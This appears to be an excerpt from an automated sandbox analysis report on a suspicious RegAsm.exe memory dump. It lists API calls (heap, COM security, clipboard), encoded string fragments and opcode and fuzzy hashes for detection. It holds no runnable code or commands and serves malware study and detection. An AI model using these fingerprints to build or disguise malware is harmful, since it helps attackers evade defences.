                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @
                                                                                          • API String ID: 0-2766056989
                                                                                          • Opcode ID: 3d42915a4dfae0f753c9c9d614c782830973cb44b7d1789a473bb08205a6188b
                                                                                          • Instruction ID: 5b656c7e600990c8c83f768d2da58a1eb6ab942e3e9d05d3ed4572ba124aa09c
                                                                                          • Opcode Fuzzy Hash: 3d42915a4dfae0f753c9c9d614c782830973cb44b7d1789a473bb08205a6188b
                                                                                          • Instruction Fuzzy Hash: EA4146729043108BD724DF14CC8572BB6E6EFC9318F09952DEAD51B391E339890487DA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: @
                                                                                          • API String ID: 2994545307-2766056989
                                                                                          • Opcode ID: c30d9002fcd7dc514339f88b301c023e088891e0e819aace388c0c87a3895ac5
                                                                                          • Instruction ID: 2b5396a7cbcf584dc174ba11a42e13b8c484934c3b2a017d16c758edba6c8df6
                                                                                          • Opcode Fuzzy Hash: c30d9002fcd7dc514339f88b301c023e088891e0e819aace388c0c87a3895ac5
                                                                                          • Instruction Fuzzy Hash: EF4125719087108BD724DF28C88176BB7E1EF99328F08862DE9D9573A1E779890487DA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 58c7cad57483e0332867fef996e189ed12e4fb39621eca5e29d299d9477f7b19
                                                                                          • Instruction ID: 1d45cd49c8fd05aeaaeddb1140c5e56ebab1f828ef4a3c98ecddc196c1e48fc2
                                                                                          • Opcode Fuzzy Hash: 58c7cad57483e0332867fef996e189ed12e4fb39621eca5e29d299d9477f7b19
                                                                                          • Instruction Fuzzy Hash: EB520BB1A04B404FD724EF38C8853ABBBD1AB55314F484A3ED4EBC73C2E679A5858746
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 66122e028bd0d37e5364923e59be28aac916e3790a983520295c21d4122b3dc6
                                                                                          • Instruction ID: c4179955eb3b506ecad94725d86d37572460f2be58fe071ec033914c990a4e49
                                                                                          • Opcode Fuzzy Hash: 66122e028bd0d37e5364923e59be28aac916e3790a983520295c21d4122b3dc6
                                                                                          • Instruction Fuzzy Hash: 3A6269B1408BC28ED3318B3C88457D6BFD5AB6A324F188A5ED0FA873D2D7B46145C766
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4936ffb1482f26b18cd8ef871f4b006edd52530ba18624d8a0e96486f28874f8
                                                                                          • Instruction ID: 41df2ee1f34f8923036c5875556315f416446aa4bda329096742cdb3a874c781
                                                                                          • Opcode Fuzzy Hash: 4936ffb1482f26b18cd8ef871f4b006edd52530ba18624d8a0e96486f28874f8
                                                                                          • Instruction Fuzzy Hash: 8E02CBB24093419BC7108F25D9516ABBBF2FFD1314F18892DE4DA4B351EB78CA45CB8A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e4723740ff2a669596a5d20837f2203e1f3b6997d03ccaa3fb7df26661f2ebbe
                                                                                          • Instruction ID: 8021b61b91686c684e5153a0de6d9c5086378017e9a8915c9d08a5aa9ac3a45b
                                                                                          • Opcode Fuzzy Hash: e4723740ff2a669596a5d20837f2203e1f3b6997d03ccaa3fb7df26661f2ebbe
                                                                                          • Instruction Fuzzy Hash: 7C91F3316083418BD728CF29D89263FBBE2EBD9314F19993EE89697391D739DC018746
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 44a8b40da777ccc37ffb2cefeaac9c54870d896984330e367bddfcfb06bf370b
                                                                                          • Instruction ID: af3b18ce9d5032665110f7bbc2be4a0e577e34248e010fd082cb7a8c57931f38
                                                                                          • Opcode Fuzzy Hash: 44a8b40da777ccc37ffb2cefeaac9c54870d896984330e367bddfcfb06bf370b
                                                                                          • Instruction Fuzzy Hash: BA9128316043019BCB28DF28C89163FB7E2EFD9714F19D52EE98697361EB389C119786
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 3b3de84cc018863acc0d7cdbe36cfe748e5a9e48987eb265f65e1ddc9bc43305
                                                                                          • Instruction ID: ddd76e43878e230a35199c21c5d20057d81198ffaeea4075007cb5b9b46d9dd3
                                                                                          • Opcode Fuzzy Hash: 3b3de84cc018863acc0d7cdbe36cfe748e5a9e48987eb265f65e1ddc9bc43305
                                                                                          • Instruction Fuzzy Hash: 45418B357083005FD3249E68DC91B7BB79BEBC9318F29953EE6C68B391D77998014385
                                                                                          APIs
                                                                                          • RtlFreeHeap.NTDLL(?,00000000,?), ref: 00435252
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeHeap
                                                                                          • String ID: bRC
                                                                                          • API String ID: 3298025750-3544902048
                                                                                          • Opcode ID: 08d17a398102781c03aacd3aa78600df362062cc0b741c443dfec48e707bd405
                                                                                          • Instruction ID: c268e68b7134aea23e7bfd40d8636994f0a5dc38bd204ec34a6b5cf25400e4bd
                                                                                          • Opcode Fuzzy Hash: 08d17a398102781c03aacd3aa78600df362062cc0b741c443dfec48e707bd405
                                                                                          • Instruction Fuzzy Hash: 681108B9785240CFD3048FA5EC90A6BB7B6E7DA322F14447DDA4983610C6355C12D650
                                                                                          APIs
                                                                                          • CoInitializeEx.OLE32(00000000,00000002), ref: 0040E4E7
                                                                                          • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040E61D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: Initialize
                                                                                          • String ID:
                                                                                          • API String ID: 2538663250-0
                                                                                          • Opcode ID: 2636d8d4b95666fd28c3f86daa6243eb8d498ee62dd179821ce87972863d18cd
                                                                                          • Instruction ID: 3b84b6ba5a26950dd3cc778368940fc9b203b43f63e3f5f6cbf9273a436a48c3
                                                                                          • Opcode Fuzzy Hash: 2636d8d4b95666fd28c3f86daa6243eb8d498ee62dd179821ce87972863d18cd
                                                                                          • Instruction Fuzzy Hash: EE4119B4D10B40AFD370AF39DA0B7167EB4AB06210F40472DF9F69A6D4E634A4198BD7
                                                                                          APIs
                                                                                          • RtlReAllocateHeap.NTDLL(?,00000000,00000000), ref: 00437A53
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: 4a9a3344529e290cb0fc8b27f84cd4566024da22360704b1f38b620ed1727304
                                                                                          • Instruction ID: 60750590879d8edde0dcc5f378c58808f1bbc292999bbc851ec8f910618dddf9
                                                                                          • Opcode Fuzzy Hash: 4a9a3344529e290cb0fc8b27f84cd4566024da22360704b1f38b620ed1727304
                                                                                          • Instruction Fuzzy Hash: 930147B4909241CBD714AF30ECA162B77A5EF8A315F14413CE8C146250D7399815DA96
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: BlanketProxy
                                                                                          • String ID:
                                                                                          • API String ID: 3890896728-0
                                                                                          • Opcode ID: 4028d8438d01add2bbd125368f4a99e458155ecc1713dd12b6cb27ea5b703e13
                                                                                          • Instruction ID: 35a5a9ef0586cb0596a52e0b89474d27adacd76d4834389a5504c46cf8311865
                                                                                          • Opcode Fuzzy Hash: 4028d8438d01add2bbd125368f4a99e458155ecc1713dd12b6cb27ea5b703e13
                                                                                          • Instruction Fuzzy Hash: 8FF092B46097028FE310DF25D5E875BBBF1BB89304F10892CE1944B395C7B5AA49CF82
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: BlanketProxy
                                                                                          • String ID:
                                                                                          • API String ID: 3890896728-0
                                                                                          • Opcode ID: b0116282326a86677bb34cd14543b4e69797e90f4af7736c0739cd63051e0e8c
                                                                                          • Instruction ID: 903258602f49e14f6adfd34400e3e56730b9861d4db669cf82a1e18b85cc5156
                                                                                          • Opcode Fuzzy Hash: b0116282326a86677bb34cd14543b4e69797e90f4af7736c0739cd63051e0e8c
                                                                                          • Instruction Fuzzy Hash: B5F0B7711087038FE311CF25D59879BBBE6BB84308F25C92CE4A44B294D7B9A6498FC2
                                                                                          APIs
                                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040D8E7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeSecurity
                                                                                          • String ID:
                                                                                          • API String ID: 640775948-0
                                                                                          • Opcode ID: 8f34514818a4dbd99378cf47e32d4ddb67e5e2e56ea6af76f9454fceffc9b2ee
                                                                                          • Instruction ID: 5538293110484e02ebb1b96dcd16c8d7df887035cdfba819c7f89892cf113db7
                                                                                          • Opcode Fuzzy Hash: 8f34514818a4dbd99378cf47e32d4ddb67e5e2e56ea6af76f9454fceffc9b2ee
                                                                                          • Instruction Fuzzy Hash: 67D0C9383C43417BF2A48718EC17F543290A706F65F300628F362FE2E0C9E07551861C
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(?,00000000), ref: 0043518F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: ad9e2aec20d7d2099f3eda949cfc04a9cce4472c31d53c2a3a324f60df134ed8
                                                                                          • Instruction ID: 4ce0c7cee30605b9a90a0e6282b988994a68904df8fa599fe345d065fab03941
                                                                                          • Opcode Fuzzy Hash: ad9e2aec20d7d2099f3eda949cfc04a9cce4472c31d53c2a3a324f60df134ed8
                                                                                          • Instruction Fuzzy Hash: 39B012B8145300EFD6084F10EC04F35372DFB4E712F300028E809451F2C7219C42EE08
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                          • String ID: !$!$"$"$'$,
                                                                                          • API String ID: 2832541153-753487525
                                                                                          • Opcode ID: 0f2531d53cc6569e23132117242616628327beefc03623687c4d1d6e7166fefe
                                                                                          • Instruction ID: ea39970e521076c57d1830cdc12096e735ed4f875d45d8c7604cb3eadc15c296
                                                                                          • Opcode Fuzzy Hash: 0f2531d53cc6569e23132117242616628327beefc03623687c4d1d6e7166fefe
                                                                                          • Instruction Fuzzy Hash: 1241B07160C7A1CFD300AF79A84836FBFD0AB92314F444A3EE4D5863C2D678854A879B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $$%'' $(`v.$*+%/$+?58$1jhe$1jhe$=51r$D@2B$UT$jC$~$~up
                                                                                          • API String ID: 0-2966609730
                                                                                          • Opcode ID: 974bcfaac64501dcc23cd694accc03719d332cf1bac7499fbeea4e48c36db7e5
                                                                                          • Instruction ID: 8913ae64c24272e4b78cdd61b5ea422752c9af8fa353da5ef93a4d2acc2eb27e
                                                                                          • Opcode Fuzzy Hash: 974bcfaac64501dcc23cd694accc03719d332cf1bac7499fbeea4e48c36db7e5
                                                                                          • Instruction Fuzzy Hash: 23C1E3712083918BD7158F29C45036BBFE1AFD7344F1889AEE4C59B383D679C846CBA6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 2EB$GBUP$GBUP$NDNC$VDB$at$mmeh$v|v{
                                                                                          • API String ID: 0-1293991445
                                                                                          • Opcode ID: a2d765671aae58ea82ad982161eaa156ba4ccde77dc4bafcfee3942f5f4ba502
                                                                                          • Instruction ID: 6d9d23eaf7c9b8f60bd5eb59f014fbe221409bbc4922422c1e7f48475a28a3c2
                                                                                          • Opcode Fuzzy Hash: a2d765671aae58ea82ad982161eaa156ba4ccde77dc4bafcfee3942f5f4ba502
                                                                                          • Instruction Fuzzy Hash: BFC11EB1508361CFC3108F28E85166BBBF1EF92308F44892EF5D58B3A1D7798945CB5A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 2A$BA$InA>$]YZT$^YKK$ejkh$ejkh
                                                                                          • API String ID: 0-2501440178
                                                                                          • Opcode ID: 387fe459d5cac185aeacdf7c411e5dd9b18c0804bc7325cc3e0806bf6ca8ba28
                                                                                          • Instruction ID: a47b4ad9bf7744206d3a7f254c9e1dcd249f058c7ad3c76417d74244c9276c4a
                                                                                          • Opcode Fuzzy Hash: 387fe459d5cac185aeacdf7c411e5dd9b18c0804bc7325cc3e0806bf6ca8ba28
                                                                                          • Instruction Fuzzy Hash: 2932EE75A18201CFD718CF28DC9062BB7E2FF8A304F49897CE98297395EB799941CB45
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: H*B$Kq$dc$dM
                                                                                          • API String ID: 0-3225756899
                                                                                          • Opcode ID: 4d5afb085f1de1cdcb1a39160c87c27283914ec5fe4bd3a4b3e4afb93d4d81b9
                                                                                          • Instruction ID: ceb2c949ce499c274e220a850f559ada6a87e4ecb18960b7d0d3933cd50f6906
                                                                                          • Opcode Fuzzy Hash: 4d5afb085f1de1cdcb1a39160c87c27283914ec5fe4bd3a4b3e4afb93d4d81b9
                                                                                          • Instruction Fuzzy Hash: E3D1FDB59083508BD3249F20D98171BBBE1FF86308F448A6DF4C59B391D7B98906CB8B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: "[:Y$+_-]$ejkh$SQ$WU
                                                                                          • API String ID: 0-2082499474
                                                                                          • Opcode ID: a01dc65a79e1fc0a3796b4adfbeb9cacd2f592b98b9a6e38fac2d9fe72f9864c
                                                                                          • Instruction ID: fd86044e426286e8d8ebb30a7dc7b42619d3dd126de2e8ae1a07989d5bf6efea
                                                                                          • Opcode Fuzzy Hash: a01dc65a79e1fc0a3796b4adfbeb9cacd2f592b98b9a6e38fac2d9fe72f9864c
                                                                                          • Instruction Fuzzy Hash: 9B221176609310CBD324CF14C8917EBBBE2EFC5714F19892DE4865B3A5DB798841CB86
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: PW$X\$x$fA$wu
                                                                                          • API String ID: 0-3536566836
                                                                                          • Opcode ID: 3872f72b89aaba8d6f8e3bf68b9b1a64bf4710b72312887deaa8c804bae6492b
                                                                                          • Instruction ID: 42ac8be07dc4e80f5121cd989de2eab78f71d611ebd432e545343cbc95fd4df9
                                                                                          • Opcode Fuzzy Hash: 3872f72b89aaba8d6f8e3bf68b9b1a64bf4710b72312887deaa8c804bae6492b
                                                                                          • Instruction Fuzzy Hash: 41E1A1B55093408BD3348F24C8917ABB7F1FF91314F09892DE8D99B391E7788985CB96
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: 2$9$ejkh$gfff$gfff
                                                                                          • API String ID: 2994545307-4198051223
                                                                                          • Opcode ID: 79b57fb225a2dfef1258851d9fd4bc572659ae3b9c8c04ff5f109cee309ad3ef
                                                                                          • Instruction ID: 0df043c23fe6d8bb08545f16a9bd9a3e9aaca608c94804bc1987791e5041165a
                                                                                          • Opcode Fuzzy Hash: 79b57fb225a2dfef1258851d9fd4bc572659ae3b9c8c04ff5f109cee309ad3ef
                                                                                          • Instruction Fuzzy Hash: C6B17A76A142104BE728CF29DC517BB77D6ABC5314F18863EE486CB3D5EB3C98428785
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %*+($C/B$PP$w/B${,B
                                                                                          • API String ID: 0-972049859
                                                                                          • Opcode ID: f108147e9c89b25c338d66684fe976734d3acc4cc0822a4b8e8ab584e82e0512
                                                                                          • Instruction ID: 717facf3f3cedcee0e29cd7bb72283fb7293ab32d829b1644d91dedf2cefdbd7
                                                                                          • Opcode Fuzzy Hash: f108147e9c89b25c338d66684fe976734d3acc4cc0822a4b8e8ab584e82e0512
                                                                                          • Instruction Fuzzy Hash: 81B10DB5A083519FE724CF24D84072BBBE1FBC4314F54892DF9889B391D7B99906CB86
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %*+($C/B$PP$w/B${,B
                                                                                          • API String ID: 0-972049859
                                                                                          • Opcode ID: fe1946e3b1cf6f2bd98be23209126c813e27a9e979bb00ec56290447f67d950f
                                                                                          • Instruction ID: 91e5af7dfd4d1b432d4c3a5b7e5db04e7f879f67a42b4b443800b3520032827c
                                                                                          • Opcode Fuzzy Hash: fe1946e3b1cf6f2bd98be23209126c813e27a9e979bb00ec56290447f67d950f
                                                                                          • Instruction Fuzzy Hash: 48A1FCB5A083519FE724CF24D94071BBBE1FBC4314F54892DF9899B3A1C7B98906CB86
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 8$InA>$l$uHu
                                                                                          • API String ID: 0-4218388648
                                                                                          • Opcode ID: f5d642fa0ffd220e39949634d70071f11485dae9cd0168edfd9d2f684acb2cae
                                                                                          • Instruction ID: 6e336c0141b80e9053e6c9efad2ab916e00c8f184afe8afe6843256310ee380e
                                                                                          • Opcode Fuzzy Hash: f5d642fa0ffd220e39949634d70071f11485dae9cd0168edfd9d2f684acb2cae
                                                                                          • Instruction Fuzzy Hash: 1D22E0312483518FD325CF28C49035FBBE1EB85314F19892DE8E99B392DB79C846CB86
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: %*+($InA>$InA>$f
                                                                                          • API String ID: 2994545307-1212648752
                                                                                          • Opcode ID: ac35db6d584336e3fa4805ebf6ee7b0a43999d61e557685217b1f6ece38c82e2
                                                                                          • Instruction ID: 50aff219358f5675aa6f0c4d8643ac969e62ddd3a6662522db26653b1bd1f920
                                                                                          • Opcode Fuzzy Hash: ac35db6d584336e3fa4805ebf6ee7b0a43999d61e557685217b1f6ece38c82e2
                                                                                          • Instruction Fuzzy Hash: ED32C0716083429FC714CF28C880B6FBBE1ABC9314F199A2EF59597392D735D805CB5A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %*+($%*+($bB$us
                                                                                          • API String ID: 0-129184300
                                                                                          • Opcode ID: 0fe5194c6e907e687f7a54dcbff3389ceeccdf48b6d5c925e3d6e5713d1c76ed
                                                                                          • Instruction ID: 590475790362aef5775324c60ec827194400d7162bef6e2668fc85afdb8847b9
                                                                                          • Opcode Fuzzy Hash: 0fe5194c6e907e687f7a54dcbff3389ceeccdf48b6d5c925e3d6e5713d1c76ed
                                                                                          • Instruction Fuzzy Hash: 1BA126756083409FD714CF24E98166FB7E4FB9A304F84893EF58683262DB39C946CB4A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: "J@$;Y@$N@$K@
                                                                                          • API String ID: 0-1730295375
                                                                                          • Opcode ID: 15aae6e7272fa08203538032254bb88678a499e30f6aa6b7ee89e3970efa9c87
                                                                                          • Instruction ID: 23f8f128b1a99b4721173781899bae97d61687cc4df7deceabcde4945cdf5fe6
                                                                                          • Opcode Fuzzy Hash: 15aae6e7272fa08203538032254bb88678a499e30f6aa6b7ee89e3970efa9c87
                                                                                          • Instruction Fuzzy Hash: 7CD19A79608201CFD708CF28D89075A7BE2FF89316F19867DEA4987390D734D961CB85
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %*+($%*+($bB$us
                                                                                          • API String ID: 0-129184300
                                                                                          • Opcode ID: afd9d6476059291c9e1c5f28bdc3c9cb475815795ff43ac9887a5c8d80f85adc
                                                                                          • Instruction ID: ddeffff2759a784cbc53f1a2ecf64e294b928d1d034bf9a5d3b5659c05783524
                                                                                          • Opcode Fuzzy Hash: afd9d6476059291c9e1c5f28bdc3c9cb475815795ff43ac9887a5c8d80f85adc
                                                                                          • Instruction Fuzzy Hash: 9F9104752183418FD708CF25E98166FB7E0FB9A304F84893EF58693266D738C906CB4A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %$($*$+
                                                                                          • API String ID: 0-716900633
                                                                                          • Opcode ID: e7f5f915ab38a388eb0fa8733627ef1a6cc0f564c7a3bec1d7882af5557d21d1
                                                                                          • Instruction ID: a51c5c8ac9f6d7c7a3fd8f98cef6b729382aa65ecbccedb91254e535b2ff582a
                                                                                          • Opcode Fuzzy Hash: e7f5f915ab38a388eb0fa8733627ef1a6cc0f564c7a3bec1d7882af5557d21d1
                                                                                          • Instruction Fuzzy Hash: F6D19020508BC18ED7328A3C888435ABFE15B67324F1C8B9DD4EA8B7D3C7799546C766
                                                                                          Strings
                                                                                          • 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 0042C13A
                                                                                          • 3, xrefs: 0042C080
